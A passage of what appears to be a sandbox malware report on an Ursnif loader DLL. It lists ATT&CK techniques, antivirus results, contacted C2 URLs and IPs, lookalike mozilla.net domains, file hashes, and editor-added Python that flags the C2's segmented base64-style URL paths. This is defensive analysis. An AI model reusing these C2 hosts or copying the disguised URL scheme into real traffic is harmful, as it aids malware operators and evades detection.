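    "00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp",
    "00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp",
    "00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for r in summarize_regions(YARA_HIT_DUMPS):
        print(f"process {r['process_index']} base {r['base']:#x}: {r['snapshots']} dumps, "
              f"{r['protect']}, {r['region_type']}, kinds {r['kinds']}")
```

Under the stated assumptions the nine hits reduce to one record: process 3, base 0x5108000, private read-write memory, eight in-flight snapshots and one end-of-process dump. That is the shape to expect for an unpacked Ursnif stage: the on-disk Zeip.dll is only the loader, and the detectable content never touches the file system.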
MITRE ATT&CK matrix (one line per tactic column; a number in brackets is the signature-count badge exactly as rendered on the cell, and a cell without a number had no matching signature)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation [1]; Native API [12]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [111]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Virtualization/Sandbox Evasion [12]; Process Injection [111]; Obfuscated Files or Information [2]; Rundll32 [1]; Software Packing [1]; Steganography; Compile After Delivery; Indicator Removal from Tools
Credential Access: Input Capture [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery [1]; Security Software Discovery [111]; Virtualization/Sandbox Evasion [12]; Process Discovery [1]; Account Discovery [1]; System Owner/User Discovery [1]; Remote System Discovery [1]; System Information Discovery [124]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Input Capture [1]; Archive Collected Data [11]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [2]; Ingress Tool Transfer [4]; Non-Application Layer Protocol [3]; Application Layer Protocol [13]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Data Encrypted for Impact [1]; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Behavior graph: rendered as an image in the original report and not reproduced here. Legend of that graph: Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet.
Antivirus detection (submitted sample)
Source: Zeip.dll | Detection: 32% | Scanner: Virustotal
Source: Zeip.dll | Detection: 100% | Scanner: Joe Sandbox ML

No Antivirus matches

Antivirus detection (unpacked PE files from memory)
Source: 3.2.rundll32.exe.400000.0.unpack | Detection: 100% | Scanner: Avira | Label: TR/Crypt.ZPACK.Gen2
Source: 3.2.rundll32.exe.4b90000.2.unpack | Detection: 100% | Scanner: Avira | Label: HEUR/AGEN.1245293

No Antivirus matches

Antivirus detection (URLs)
Source: http://80.77.25.109/fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/Fabd4fjNq/DSsjhIayoRb3vEB0gYF1/DvOBMdqirpHwq9OOdKp/l0IRYH1_2FrZtdyrRlJpVe/H42NRq5RQ81GK/VCcbxNs_/2FZJHoRNxFlaAYrUN5O5LcL/v418d_2By_/2BRt8_2Bs3hdtDQLK/oecVg251dFjL/TwR5ovb3LSr/UbFTKRYVAf_2BS/5oocK_2FZTCnj_2Bk7f5k/WVm6_2F1PqjI22z0/31vjGE0KZ/X3zQUGvA.bak | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
Source: http://170.130.165.182/ | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
Source: http://170.130.165.182/fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/fa | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
Source: http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.bak | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: http://170.130.165.182/fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/faDX7AnA7p_2FL2kFpu49/EdapT6mXzLN5rW1a/SHFg4AdpPfCaQnC/CaQclcnPKuVX6yIIBl/W7EdbR3h4/Baog4bkRBbEa_2Bk3PMN/6evVCCp2n5IHM6zv9Ax/6y6Xf8N9YXabol05shGVYH/wNzbR_2FsIJoL/mKWJ5fSu/iIED2oXHSZaY9qZ9s7kS1uo/kYtbGsIEzt/S4yUXjfCecHcWUBLD/uwFDVmrla6y/oLDy.bak | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
Source: http://80.77.25.109/fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/ | Detection: 0% | Scanner: Avira URL Cloud | Label: safe

The Avira URL Cloud label is a reputation lookup on the exact URL, not a verdict on the host: the 80.77.25.109 and 170.130.165.182 paths come back "safe" only because they are unique per victim and had not been seen before, while the report itself marks all three hosts as malicious in the IP table below and the 80.77.23.77 path, which follows the same pattern, is already labelled "malware".
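The contacted URLs above share one shape: a short directory ("fonts"), a long run of alphanumeric path segments in which "_2F" and "_2B" recur (sometimes split across a "/", as in "VCcbxNs_/2FZJ"), and a trailing ".bak". 0x2F and 0x2B are the byte values of "/" and "+", the two base64 characters that cannot travel raw inside a path segment, so each path reads as a base64 blob with those characters rewritten and the result chopped into segments. The following added example is editor's code, not part of the Joe Sandbox report: it scores URLs on that shape and runs the check over the URLs listed on this page plus constructed control inputs (the bare host root from the report and two benign font URLs). The base64 reading of the tokens, the extra "_0A" token, the thresholds and all function names are the editor's assumptions, not facts the report states.

```python
import re
from urllib.parse import urlsplit

# Assumption: "_2F" and "_2B" encode the bytes 0x2F ('/') and 0x2B ('+'); "_0A" is
# included on the same reading for a third non-alphanumeric character. Only _2F and
# _2B occur in the URLs on this page.
TOKEN_RE = re.compile(r"_2F|_2B|_0A")


def split_path(url):
    """Return (leading_dir, payload_segments) for the path of a URL.

    The contacted URLs all start with one short lower-case directory ('fonts');
    it is split off so that it does not count towards the payload."""
    segments = [s for s in urlsplit(url).path.split("/") if s]
    if segments and segments[0].isalpha() and segments[0].islower():
        return segments[0], segments[1:]
    return "", segments


def score_url(url):
    """Measure how closely a URL path follows the segmented, token-encoded shape."""
    leading, segments = split_path(url)
    body = "".join(segments)            # join first: a token may straddle a '/'
    body, ext = body.rsplit(".", 1) if "." in body else (body, "")
    stripped = TOKEN_RE.sub("", body)
    return {
        "leading_dir": leading,
        "segments": len(segments),
        "tokens": len(TOKEN_RE.findall(body)),
        "payload_len": len(stripped),
        "payload_is_alnum": stripped.isascii() and stripped.isalnum(),
        "ext": ext,
    }


def is_segmented_token_url(url, min_segments=3, min_tokens=2, min_payload=32):
    """Heuristic verdict; the thresholds are tuning choices, not values from the report."""
    s = score_url(url)
    return (s["segments"] >= min_segments and s["tokens"] >= min_tokens
            and s["payload_len"] >= min_payload and s["payload_is_alnum"])


def classify(urls):
    return {url: is_segmented_token_url(url) for url in urls}


# Full URLs as listed in this report (the in-memory mozilla.net one is truncated
# in the report and is used as is); they serve as constructed test input.
REPORT_PAYLOAD_URLS = [
    "http://80.77.25.109/fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/"
    "mLbIpFep6ip0wCkR_2/Fabd4fjNq/DSsjhIayoRb3vEB0gYF1/DvOBMdqirpHwq9OOdKp/"
    "l0IRYH1_2FrZtdyrRlJpVe/H42NRq5RQ81GK/VCcbxNs_/2FZJHoRNxFlaAYrUN5O5LcL/v418d_2By_/"
    "2BRt8_2Bs3hdtDQLK/oecVg251dFjL/TwR5ovb3LSr/UbFTKRYVAf_2BS/5oocK_2FZTCnj_2Bk7f5k/"
    "WVm6_2F1PqjI22z0/31vjGE0KZ/X3zQUGvA.bak",
    "http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/"
    "0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/"
    "Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/"
    "xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/"
    "lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.bak",
    "http://170.130.165.182/fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/"
    "zffWIXZHaC8HuA/faDX7AnA7p_2FL2kFpu49/EdapT6mXzLN5rW1a/SHFg4AdpPfCaQnC/"
    "CaQclcnPKuVX6yIIBl/W7EdbR3h4/Baog4bkRBbEa_2Bk3PMN/6evVCCp2n5IHM6zv9Ax/"
    "6y6Xf8N9YXabol05shGVYH/wNzbR_2FsIJoL/mKWJ5fSu/iIED2oXHSZaY9qZ9s7kS1uo/kYtbGsIEzt/"
    "S4yUXjfCecHcWUBLD/uwFDVmrla6y/oLDy.bak",
    "http://protectioon.cdn4.mozilla.net/fonts/zo_2F9LTFy1/2yei3vv_2FO_2B/"
    "_2FhNinG_2BU_2Bmlgeam/LapYRzVWz",
]

# Controls: the bare host root from the report and two constructed benign font URLs.
CONTROL_URLS = [
    "http://170.130.165.182/",
    "https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2",
    "http://example.com/fonts/Roboto_2F.woff",
]

if __name__ == "__main__":
    for url, hit in classify(REPORT_PAYLOAD_URLS + CONTROL_URLS).items():
        print("HIT " if hit else "miss", url[:72])
```

The check is written for whole URLs; the truncated forms the report prints in its memory-strings table (ending in "_2/" or "/q") lose tokens and would not reach the thresholds. On live traffic the same logic belongs in a proxy-log query keyed on the path, where the combination of a "fonts" or "images" directory, many segments, and repeated "_2F"/"_2B" is far rarer than either feature alone.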
Domains
Name: trackingg-protectioon.cdn4.mozilla.net | IP: unknown | Active: unknown | Malicious: false | Reputation: high
Name: protectioon.cdn4.mozilla.net | IP: unknown | Active: unknown | Malicious: false | Reputation: high

Both names sit under the real mozilla.net zone but are misspelt lookalikes (doubled letters, "cdn4") of Mozilla's tracking-protection CDN host; neither resolved during the run, which is what the "tries to resolve domain names, but no domain seems valid" signature reflects. The "high" reputation should not be read as clearing these lookups: the URL on protectioon.cdn4.mozilla.net recovered from rundll32.exe memory below follows the same segmented "_2F"/"_2B" path pattern as the URLs labelled malware.
Contacted URLs
URL: http://80.77.25.109/fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/Fabd4fjNq/DSsjhIayoRb3vEB0gYF1/DvOBMdqirpHwq9OOdKp/l0IRYH1_2FrZtdyrRlJpVe/H42NRq5RQ81GK/VCcbxNs_/2FZJHoRNxFlaAYrUN5O5LcL/v418d_2By_/2BRt8_2Bs3hdtDQLK/oecVg251dFjL/TwR5ovb3LSr/UbFTKRYVAf_2BS/5oocK_2FZTCnj_2Bk7f5k/WVm6_2F1PqjI22z0/31vjGE0KZ/X3zQUGvA.bak | Malicious: true | Avira URL Cloud: safe | Reputation: unknown
URL: http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.bak | Malicious: true | Avira URL Cloud: malware | Reputation: unknown
URL: http://170.130.165.182/fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/faDX7AnA7p_2FL2kFpu49/EdapT6mXzLN5rW1a/SHFg4AdpPfCaQnC/CaQclcnPKuVX6yIIBl/W7EdbR3h4/Baog4bkRBbEa_2Bk3PMN/6evVCCp2n5IHM6zv9Ax/6y6Xf8N9YXabol05shGVYH/wNzbR_2FsIJoL/mKWJ5fSu/iIED2oXHSZaY9qZ9s7kS1uo/kYtbGsIEzt/S4yUXjfCecHcWUBLD/uwFDVmrla6y/oLDy.bak | Malicious: true | Avira URL Cloud: safe | Reputation: unknown

URLs found in process memory
URL: http://170.130.165.182/ | Source: rundll32.exe, 00000003.00000002.772970164.0000000000B32000.00000004.00000020.00020000.00000000.sdmp; rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
URL: http://170.130.165.182/fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/fa | Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
URL: http://protectioon.cdn4.mozilla.net/fonts/zo_2F9LTFy1/2yei3vv_2FO_2B/_2FhNinG_2BU_2Bmlgeam/LapYRzVWz | Source: rundll32.exe, 00000003.00000002.772970164.0000000000B32000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
URL: http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q | Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: malware | Reputation: unknown
URL: http://80.77.25.109/fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/ | Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
Reputation legend:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
Contacted IPs
IP: 80.77.23.77 | Domain: unknown | Country: Germany | ASN: 34549 | ASN Name: MEER-AS meerfarbig GmbH & Co. KG (DE) | Malicious: true
IP: 80.77.25.109 | Domain: unknown | Country: Germany | ASN: 34549 | ASN Name: MEER-AS meerfarbig GmbH & Co. KG (DE) | Malicious: true
IP: 170.130.165.182 | Domain: unknown | Country: United States | ASN: 62904 | ASN Name: EONIX-COMMUNICATIONS-ASBLOCK-62904 (US) | Malicious: true
            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:790195
            Start date and time:2023-01-23 22:57:59 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 8m 14s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:Zeip.dll
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:24
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winDLL@9/12@4/3
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 43.6% (good quality ratio 40.1%)
            • Quality average: 77.6%
            • Quality standard deviation: 31%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 51
            • Number of non-executed functions: 37
            Cookbook Comments:
            • Found application associated with file extension: .dll
            • Override analysis time to 240s for rundll32
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 20.189.173.20, 20.189.173.22
            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, cdn.onenote.net
• Not all processes were analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
22:59:02 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
22:59:10 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
Context (IPs)
Match: 170.130.165.182 | Associated sample / URL: https://url12.mailanyone.net/scanner?m=1oXqNK-0004QR-3y&d=4%7Cmail%2F14%2F1663015200%2F1oXqNK-0004QR-3y%7Cin12g%7C57e1b682%7C20662927%7C7707187%7C631F9B6ED9B3E5F62454777326EE38A8&s=5awqXuaUaEfeIt8VQj9hJMyA2Ac&o=%2Fphtr%3A%2Fptsctive-acaeobssngci.bmoc.c | Detection: malicious
              No context
Context (ASNs)
Match: MEER-AS meerfarbig GmbH & Co. KG (DE), the ASN of both 80.77.23.77 and 80.77.25.109. Other samples previously seen contacting this ASN (sample name or URL | detection | IP contacted):
111.exe | malicious | 80.77.25.65
eWASheoagJ.exe | malicious | 5.1.86.195
Cheshire_east_council_section_106_agreement (zx).js | malicious | 83.243.40.10
https://www.consulting-werning.de/wp-includes/Requests/web22/elmarie@nelsonborman.co.za | malicious | 83.243.40.10
G6r5jK4OD1.exe | malicious | 91.151.88.159
http://cainarchaeology.weebly.com/ | malicious | 185.44.104.99
skid.x86-20220815-1256 | malicious | 83.243.46.34
p-p.c-.ISIS | malicious | 91.151.89.220
i-5.8-6.ISIS | malicious | 91.151.89.220
a-r.m-7.ISIS | malicious | 91.151.89.220
m-p.s-l.ISIS | malicious | 91.151.89.220
m-i.p-s.ISIS | malicious | 91.151.89.220
a-r.m-5.ISIS | malicious | 91.151.89.220
a-r.m-6.ISIS | malicious | 91.151.89.220
s-h.4-.ISIS | malicious | 91.151.89.220
x-8.6-.ISIS | malicious | 91.151.89.220
x-3.2-.ISIS | malicious | 91.151.89.220
20993091.xlsx | malicious | 45.86.220.131
xjO2lyWgAV | malicious | 45.13.237.162
JC9Omiiy5m.exe | malicious | 91.151.88.245
              No context
              No context
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.757401484798945
              Encrypted:false
              SSDEEP:96:jmF9X5pyIy9hylKofTpXIQcQfc6vpcE46cw32+a+z+HbHgMiuuvZGxzz8sv5o5ok:SXSIHRLpS6Ijpq/u7ssS274ItW
              MD5:5EBFD76DE5EB69033EDF40A80052205D
              SHA1:DD1BE9A4697186C51CB276C49BF65A8F6C5BF7D1
              SHA-256:B2D99E1AD9CEE6573E4C2547B5DC9F23A7FDACC0168875F40DC09F064046D3B7
              SHA-512:AFD4DB13C2086BF11E08214CE9DE70C240C38FC0FB1BDBE504F2C3A44B4920B60A93C039BA3A337C7FB62EC5A8DBF7541F58CC3B6B02BFD6117122DD246DD4A1
              Malicious:false
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.0.1.7.1.4.2.7.4.2.6.8.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.0.1.7.1.4.3.3.0.5.1.7.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.c.c.2.6.b.f.-.b.0.f.0.-.4.8.5.8.-.a.5.9.c.-.8.0.8.e.0.3.6.b.a.6.7.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.d.6.9.4.b.c.-.4.b.1.7.-.4.3.4.4.-.9.1.2.5.-.3.2.d.2.8.4.4.b.c.f.5.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.b.c.-.0.0.0.1.-.0.0.1.a.-.8.3.a.d.-.5.6.5.4.c.1.2.f.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7541910840269821
              Encrypted:false
              SSDEEP:96:pLq5pyJy9hylKgPSZpXIQcQGc6McE+cw3/7+a+z+HbHgMiuuvZGxzz8sv5o5oPoK:zeHoIE/jpq/u7ssS274Itb
              MD5:335D1D0C11BECDC67416890E4A7A5040
              SHA1:972DBF92D1F34A3A65BC224D3F6421730A6C4214
              SHA-256:4C5EACACF3EF686FF3F324363763E4CB4277B7E59AD93A6AE983EA85A3463D82
              SHA-512:EC22CCFA17E7375C2EF159D4D9B8818236E44A89C7C148015E7CA527862EE68A275B175C819CE66FABF64C78A9DA539CF8F90BF67114A24341C2605C16169B9F
              Malicious:false
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.0.1.7.1.3.8.7.5.7.6.9.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.5.7.c.b.c.a.-.9.f.a.4.-.4.3.8.5.-.8.0.c.2.-.2.e.4.a.b.9.0.a.4.5.c.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.f.4.b.1.6.9.-.4.d.e.b.-.4.b.a.a.-.9.0.f.d.-.0.8.f.9.2.c.9.2.5.7.8.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.b.c.-.0.0.0.1.-.0.0.1.a.-.8.3.a.d.-.5.6.5.4.c.1.2.f.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.1.0././.0.3.:.0.5.:.5.0.:.2.8.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7613316410520359
              Encrypted:false
              SSDEEP:96:MnVFR5pyCy9hyoB7JnspXIQcQGc6McE+cw3/7+a+z+HbHgMiuuvZGxzz8sv5o5ok:MuMHoIE/jpq/u7ssS274ItW
              MD5:C8EB5C5D0E434F426678E23C81C162EF
              SHA1:41E262A03A384AEC1F74D228AC876FB51DD80325
              SHA-256:3EB69586EE775D64197C0CCE033FCB396232483DC21D8FD0804BF75D81133EC6
              SHA-512:DBA15A6731F4DCA683336E8A2DC87BA498CA3A2F41CA320875D28C1F1119378BC2CDA0EC13743D23E76163ED55679082A57FAB56B197953E3FC18C50862BF862
              Malicious:false
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.0.1.7.1.4.0.0.1.7.1.7.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.0.1.7.1.4.0.5.1.7.1.6.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.8.c.0.6.1.6.-.a.a.c.f.-.4.b.c.0.-.8.3.d.5.-.c.0.4.8.e.a.d.d.2.4.2.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.d.e.1.e.5.9.-.3.7.5.8.-.4.a.f.a.-.a.a.9.6.-.1.a.2.a.f.d.d.4.0.7.a.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.b.c.-.0.0.0.1.-.0.0.1.a.-.8.3.a.d.-.5.6.5.4.c.1.2.f.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 15 streams, Tue Jan 24 06:58:59 2023, 0x1205a4 type
              Category:dropped
              Size (bytes):39646
              Entropy (8bit):2.0402991444558083
              Encrypted:false
